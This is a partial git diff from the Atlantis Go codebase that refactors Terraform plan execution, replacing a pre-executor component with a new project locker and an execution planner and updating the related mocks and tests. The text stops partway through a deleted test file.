*MockProjectPreExecutor { - return &MockProjectPreExecutor{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) events.PreExecuteResult { - params := []pegomock.Param{ctx, repoDir, project} - result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.PreExecuteResult)(nil)).Elem()}) - var ret0 events.PreExecuteResult - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.PreExecuteResult) - } - } - return ret0 -} - -func (mock *MockProjectPreExecutor) VerifyWasCalledOnce() *VerifierProjectPreExecutor { - return &VerifierProjectPreExecutor{mock, pegomock.Times(1), nil} -} - -func (mock *MockProjectPreExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectPreExecutor { - return &VerifierProjectPreExecutor{mock, invocationCountMatcher, nil} -} - -func (mock *MockProjectPreExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectPreExecutor { - return &VerifierProjectPreExecutor{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierProjectPreExecutor struct { - mock *MockProjectPreExecutor - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) *ProjectPreExecutor_Execute_OngoingVerification { - params := []pegomock.Param{ctx, repoDir, project} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params) - return &ProjectPreExecutor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type ProjectPreExecutor_Execute_OngoingVerification struct { - mock *MockProjectPreExecutor - methodInvocations []pegomock.MethodInvocation -} - -func (c *ProjectPreExecutor_Execute_OngoingVerification) GetCapturedArguments() (*events.CommandContext, string, models.Project) { - ctx, repoDir, project := c.GetAllCapturedArguments() - return ctx[len(ctx)-1], repoDir[len(repoDir)-1], project[len(project)-1] -} - -func (c *ProjectPreExecutor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []string, _param2 []models.Project) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - _param1 = make([]string, len(params[1])) - for u, param := range params[1] { - _param1[u] = param.(string) - } - _param2 = make([]models.Project, len(params[2])) - for u, param := range params[2] { - _param2[u] = param.(models.Project) - } - } - return -} diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index 478de10a22..d994021723 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -15,12 +15,10 @@ package events import ( "fmt" - "os" - "path/filepath" - "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" @@ -28,27 +26,21 @@ import ( //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator -// LockURLGenerator consumes lock URLs. type LockURLGenerator interface { - // SetLockURL takes a function that given a lock id, will return a url - // to view that lock. - SetLockURL(func(id string) (url string)) + GenerateLockURL(lockID string) string } -// atlantisUserTFVar is the name of the variable we execute terraform -// with, containing the vcs username of who is running the command -const atlantisUserTFVar = "atlantis_user" - -// PlanExecutor handles everything related to running terraform plan. +/**/ // PlanExecutor handles everything related to running terraform plan. type PlanExecutor struct { - VCSClient vcs.ClientProxy - Terraform terraform.Client - Locker locking.Locker - LockURL func(id string) (url string) - Run run.Runner - Workspace AtlantisWorkspace - ProjectPreExecute ProjectPreExecutor - ProjectFinder ProjectFinder + VCSClient vcs.ClientProxy + Terraform terraform.Client + Locker locking.Locker + Run run.Runner + Workspace AtlantisWorkspace + ProjectFinder ProjectFinder + ProjectLocker ProjectLocker + ExecutionPlanner *repoconfig.ExecutionPlanner + LockURLGenerator LockURLGenerator } // PlanSuccess is the result of a successful plan. @@ -57,12 +49,6 @@ type PlanSuccess struct { LockURL string } -// SetLockURL takes a function that given a lock id, will return a url -// to view that lock. -func (p *PlanExecutor) SetLockURL(f func(id string) (url string)) { - p.LockURL = f -} - // Execute executes terraform plan for the ctx. func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) @@ -70,79 +56,32 @@ func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { return CommandResponse{Error: err} } - var projects []models.Project - if ctx.Command.Dir == "" { - // If they didn't specify a directory to plan in, figure out what - // projects have been modified so we know where to run plan. - modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "getting modified files")} - } - ctx.Log.Info("found %d files modified in this pull request", len(modifiedFiles)) - projects = p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, cloneDir) - if len(projects) == 0 { - return CommandResponse{Failure: "No Terraform files were modified."} - } - } else { - projects = []models.Project{{ - Path: ctx.Command.Dir, - RepoFullName: ctx.BaseRepo.FullName, - }} + stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) + if err != nil { + return CommandResponse{Error: err} } - var results []ProjectResult - for _, project := range projects { - ctx.Log.Info("running plan for project at path %q", project.Path) - result := p.plan(ctx, cloneDir, project) - result.Path = project.Path - results = append(results, result) + tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) + if err != nil { + return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} } - return CommandResponse{ProjectResults: results} -} - -func (p *PlanExecutor) plan(ctx *CommandContext, repoDir string, project models.Project) ProjectResult { - preExecute := p.ProjectPreExecute.Execute(ctx, repoDir, project) - if preExecute.ProjectResult != (ProjectResult{}) { - return preExecute.ProjectResult + if !tryLockResponse.LockAcquired { + return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} } - config := preExecute.ProjectConfig - terraformVersion := preExecute.TerraformVersion - workspace := ctx.Command.Workspace - // Run terraform plan. - planFile := filepath.Join(repoDir, project.Path, fmt.Sprintf("%s.tfplan", workspace)) - userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username) - planExtraArgs := config.GetExtraArguments(ctx.Command.Name.String()) - tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, planExtraArgs...), ctx.Command.Flags...) - - // Check if env/{workspace}.tfvars exist. - envFileName := filepath.Join("env", workspace+".tfvars") - if _, err := os.Stat(filepath.Join(repoDir, project.Path, envFileName)); err == nil { - tfPlanCmd = append(tfPlanCmd, "-var-file", envFileName) - } - output, err := p.Terraform.RunCommandWithVersion(ctx.Log, filepath.Join(repoDir, project.Path), tfPlanCmd, terraformVersion, workspace) + out, err := stage.Run() if err != nil { // Plan failed so unlock the state. - if _, unlockErr := p.Locker.Unlock(preExecute.LockResponse.LockKey); unlockErr != nil { - ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) + if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) } - return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)} + return CommandResponse{ProjectResults: []ProjectResult{{Error: fmt.Errorf("%s\n%s", err.Error(), out)}}} } - ctx.Log.Info("plan succeeded") - // If there are post plan commands then run them. - if len(config.PostPlan) > 0 { - absolutePath := filepath.Join(repoDir, project.Path) - _, err := p.Run.Execute(ctx.Log, config.PostPlan, absolutePath, workspace, terraformVersion, "post_plan") - if err != nil { - return ProjectResult{Error: errors.Wrap(err, "running post plan commands")} - } - } - - return ProjectResult{ + return CommandResponse{ProjectResults: []ProjectResult{{ PlanSuccess: &PlanSuccess{ - TerraformOutput: output, - LockURL: p.LockURL(preExecute.LockResponse.LockKey), + TerraformOutput: out, + LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), }, - } + }}} } diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go index 24e5452c9b..c9a209fe64 100644 --- a/server/events/plan_executor_test.go +++ b/server/events/plan_executor_test.go @@ -284,8 +284,5 @@ func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClie Locker: locker, Run: run, } - p.LockURL = func(id string) (url string) { - return "lockurl-" + id - } return &p, runner, locker } diff --git a/server/events/project_locker.go b/server/events/project_locker.go new file mode 100644 index 0000000000..9b7060585b --- /dev/null +++ b/server/events/project_locker.go @@ -0,0 +1,87 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events + +import ( + "fmt" + + "github.com/runatlantis/atlantis/server/events/locking" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/terraform" +) + +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker + +// ProjectLocker locks this project against other plans being run until this +// project is unlocked. +type ProjectLocker interface { + // TryLock attempts to acquire the lock for this project. It returns true if the lock + // was acquired. If it returns false, the lock was not acquired and the second + // return value will be a string describing why the lock was not acquired. + // The third return value is a function that can be called to unlock the + // lock. It will only be set if the lock was acquired. Any errors will set + // error. + TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) +} + +// DefaultProjectLocker implements ProjectLocker. +type DefaultProjectLocker struct { + Locker locking.Locker + ConfigReader ProjectConfigReader + Terraform terraform.Client + Run run.Runner +} + +// TryLockResponse is the result of trying to lock a project. +type TryLockResponse struct { + // LockAcquired is true if the lock was acquired. + LockAcquired bool + // LockFailureReason is the reason why the lock was not acquired. It will + // only be set if LockAcquired is false. + LockFailureReason string + // UnlockFn will unlock the lock created by the caller. This might be called + // if there is an error later and the caller doesn't want to continue to + // hold the lock. + UnlockFn func() error + // LockKey is the key for the lock if the lock was acquired. + LockKey string +} + +// TryLock implements ProjectLocker.TryLock. +func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) { + workspace := ctx.Command.Workspace + lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User) + if err != nil { + return nil, err + } + if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num { + failureMsg := fmt.Sprintf( + "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.", + lockAttempt.CurrLock.Pull.Num) + return &TryLockResponse{ + LockAcquired: false, + LockFailureReason: failureMsg, + }, nil + } + ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey) + return &TryLockResponse{ + LockAcquired: true, + UnlockFn: func() error { + _, err := p.Locker.Unlock(lockAttempt.LockKey) + return err + }, + LockKey: lockAttempt.LockKey, + }, nil +} diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go new file mode 100644 index 0000000000..fd95503487 --- /dev/null +++ b/server/events/project_locker_test.go @@ -0,0 +1,269 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events_test + +//import ( +// . "github.com/petergtz/pegomock" +// . "github.com/runatlantis/atlantis/testing" +//) + +//var ctx = events.CommandContext{ +// Command: &events.Command{ +// Name: events.Plan, +// }, +// Log: logging.NewNoopLogger(), +//} +//var project = models.Project{} +// +//func TestExecute_LockErr(t *testing.T) { +// t.Log("when there is an error returned from TryLock we return it") +// p, l, _, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_LockFailed(t *testing.T) { +// t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error") +// p, l, _, _ := setupPreExecuteTest(t) +// // The response has LockAcquired: false and the pull request is a number +// // different than the current pull. +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: false, +// CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}}, +// }, nil) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure) +//} +// +//func TestExecute_ConfigErr(t *testing.T) { +// t.Log("when there is an error loading config, we return it") +// p, l, _, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_PreInitErr(t *testing.T) { +// t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it") +// p, l, tm, r := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// PreInit: []string{"pre-init"}, +// }, nil) +// tfVersion, _ := version.NewVersion("0.9.0") +// When(tm.Version()).ThenReturn(tfVersion) +// When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_InitErr(t *testing.T) { +// t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it") +// p, l, tm, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// tfVersion, _ := version.NewVersion("0.9.0") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_PreGetErr(t *testing.T) { +// t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it") +// p, l, tm, r := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// PreGet: []string{"pre-get"}, +// }, nil) +// tfVersion, _ := version.NewVersion("0.8") +// When(tm.Version()).ThenReturn(tfVersion) +// When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_GetErr(t *testing.T) { +// t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it") +// p, l, tm, _ := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// tfVersion, _ := version.NewVersion("0.8") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_PreCommandErr(t *testing.T) { +// t.Log("when we get an error running pre commands we return it") +// p, l, tm, r := setupPreExecuteTest(t) +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ +// LockAcquired: true, +// }, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// PrePlan: []string{"command"}, +// }, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) +// When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err")) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error()) +//} +// +//func TestExecute_SuccessTF9(t *testing.T) { +// t.Log("when the project is on tf >= 0.9 it should be successful") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PreInit: []string{"pre-init"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion) +// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init") +//} +// +//func TestExecute_SuccessTF8(t *testing.T) { +// t.Log("when the project is on tf < 0.9 it should be successful") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PreGet: []string{"pre-get"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.8") +// When(tm.Version()).ThenReturn(tfVersion) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "") +// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get") +//} +// +//func TestExecute_SuccessPrePlan(t *testing.T) { +// t.Log("when there are pre_plan commands they are run") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PrePlan: []string{"command"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// +// res := p.Execute(&ctx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan") +//} +// +//func TestExecute_SuccessPreApply(t *testing.T) { +// t.Log("when there are pre_apply commands they are run") +// p, l, tm, r := setupPreExecuteTest(t) +// lockResponse := locking.TryLockResponse{ +// LockAcquired: true, +// } +// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) +// When(p.ConfigReader.Exists("")).ThenReturn(true) +// config := events.ProjectConfig{ +// PreApply: []string{"command"}, +// } +// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// tfVersion, _ := version.NewVersion("0.9") +// When(tm.Version()).ThenReturn(tfVersion) +// +// cpCtx := deepcopy.Copy(ctx).(events.CommandContext) +// cpCtx.Command = &events.Command{ +// Name: events.Apply, +// } +// cpCtx.Log = logging.NewNoopLogger() +// +// res := p.Execute(&cpCtx, "", project) +// Equals(t, events.TryLockResponse{ +// ProjectConfig: config, +// TerraformVersion: tfVersion, +// LockResponse: lockResponse, +// }, res) +// r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply") +//} +// +//func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectLocker, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) { +// RegisterMockTestingT(t) +// l := lmocks.NewMockLocker() +// cr := mocks.NewMockProjectConfigReader() +// tm := tmocks.NewMockClient() +// r := rmocks.NewMockRunner() +// return &events.DefaultProjectLocker{ +// Locker: l, +// ConfigReader: cr, +// Terraform: tm, +// Run: r, +// }, l, tm, r +//} diff --git a/server/events/project_pre_execute.go b/server/events/project_pre_execute.go deleted file mode 100644 index b9f1625336..0000000000 --- a/server/events/project_pre_execute.go +++ /dev/null @@ -1,140 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events - -import ( - "fmt" - "path/filepath" - "strings" - - "github.com/hashicorp/go-version" - "github.com/pkg/errors" - "github.com/runatlantis/atlantis/server/events/locking" - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/terraform" -) - -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_pre_executor.go ProjectPreExecutor - -// ProjectPreExecutor executes before the plan and apply executors. It handles -// the setup tasks that are common to both plan and apply. -type ProjectPreExecutor interface { - // Execute executes the pre plan/apply tasks. - Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult -} - -// DefaultProjectPreExecutor implements ProjectPreExecutor. -type DefaultProjectPreExecutor struct { - Locker locking.Locker - ConfigReader ProjectConfigReader - Terraform terraform.Client - Run run.Runner -} - -// PreExecuteResult is the result of running the pre execute. -type PreExecuteResult struct { - ProjectResult ProjectResult - ProjectConfig ProjectConfig - TerraformVersion *version.Version - LockResponse locking.TryLockResponse -} - -// Execute executes the pre plan/apply tasks. -func (p *DefaultProjectPreExecutor) Execute(ctx *CommandContext, repoDir string, project models.Project) PreExecuteResult { - workspace := ctx.Command.Workspace - lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User) - if err != nil { - return PreExecuteResult{ProjectResult: ProjectResult{Error: errors.Wrap(err, "acquiring lock")}} - } - if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num { - return PreExecuteResult{ProjectResult: ProjectResult{Failure: fmt.Sprintf( - "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.", - lockAttempt.CurrLock.Pull.Num)}} - } - ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey) - config, tfVersion, err := p.executeWithLock(ctx, repoDir, project) - if err != nil { - p.Locker.Unlock(lockAttempt.LockKey) // nolint: errcheck - return PreExecuteResult{ProjectResult: ProjectResult{Error: err}} - } - return PreExecuteResult{ProjectConfig: config, TerraformVersion: tfVersion, LockResponse: lockAttempt} -} - -// executeWithLock executes the pre plan/apply tasks after the lock has been -// acquired. This helper func makes revoking the lock on error easier. -// Returns the project config, terraform version, or an error. -func (p *DefaultProjectPreExecutor) executeWithLock(ctx *CommandContext, repoDir string, project models.Project) (ProjectConfig, *version.Version, error) { - workspace := ctx.Command.Workspace - - // Check if config file is found, if not we continue the run. - var config ProjectConfig - absolutePath := filepath.Join(repoDir, project.Path) - if p.ConfigReader.Exists(absolutePath) { - var err error - config, err = p.ConfigReader.Read(absolutePath) - if err != nil { - return config, nil, err - } - ctx.Log.Info("parsed atlantis config file in %q", absolutePath) - } - - // Check if terraform version is >= 0.9.0. - terraformVersion := p.Terraform.Version() - if config.TerraformVersion != nil { - terraformVersion = config.TerraformVersion - } - constraints, _ := version.NewConstraint(">= 0.9.0") - if constraints.Check(terraformVersion) { - ctx.Log.Info("determined that we are running terraform with version >= 0.9.0. Running version %s", terraformVersion) - if len(config.PreInit) > 0 { - _, err := p.Run.Execute(ctx.Log, config.PreInit, absolutePath, workspace, terraformVersion, "pre_init") - if err != nil { - return config, nil, errors.Wrapf(err, "running %s commands", "pre_init") - } - } - _, err := p.Terraform.Init(ctx.Log, absolutePath, workspace, config.GetExtraArguments("init"), terraformVersion) - if err != nil { - return config, nil, err - } - } else { - ctx.Log.Info("determined that we are running terraform with version < 0.9.0. Running version %s", terraformVersion) - if len(config.PreGet) > 0 { - _, err := p.Run.Execute(ctx.Log, config.PreGet, absolutePath, workspace, terraformVersion, "pre_get") - if err != nil { - return config, nil, errors.Wrapf(err, "running %s commands", "pre_get") - } - } - terraformGetCmd := append([]string{"get", "-no-color"}, config.GetExtraArguments("get")...) - _, err := p.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, terraformGetCmd, terraformVersion, workspace) - if err != nil { - return config, nil, err - } - } - - stage := fmt.Sprintf("pre_%s", strings.ToLower(ctx.Command.Name.String())) - var commands []string - if ctx.Command.Name == Plan { - commands = config.PrePlan - } else { - commands = config.PreApply - } - if len(commands) > 0 { - _, err := p.Run.Execute(ctx.Log, commands, absolutePath, workspace, terraformVersion, stage) - if err != nil { - return config, nil, errors.Wrapf(err, "running %s commands", stage) - } - } - return config, terraformVersion, nil -} diff --git a/server/events/project_pre_execute_test.go b/server/events/project_pre_execute_test.go deleted file mode 100644 index 27814055f2..0000000000 --- a/server/events/project_pre_execute_test.go +++ /dev/null @@ -1,282 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events_test - -import ( - "errors" - "testing" - - "github.com/hashicorp/go-version" - "github.com/mohae/deepcopy" - . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/locking" - lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks" - "github.com/runatlantis/atlantis/server/events/mocks" - "github.com/runatlantis/atlantis/server/events/models" - rmocks "github.com/runatlantis/atlantis/server/events/run/mocks" - tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/logging" - . "github.com/runatlantis/atlantis/testing" -) - -var ctx = events.CommandContext{ - Command: &events.Command{ - Name: events.Plan, - }, - Log: logging.NewNoopLogger(), -} -var project = models.Project{} - -func TestExecute_LockErr(t *testing.T) { - t.Log("when there is an error returned from TryLock we return it") - p, l, _, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_LockFailed(t *testing.T) { - t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error") - p, l, _, _ := setupPreExecuteTest(t) - // The response has LockAcquired: false and the pull request is a number - // different than the current pull. - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: false, - CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 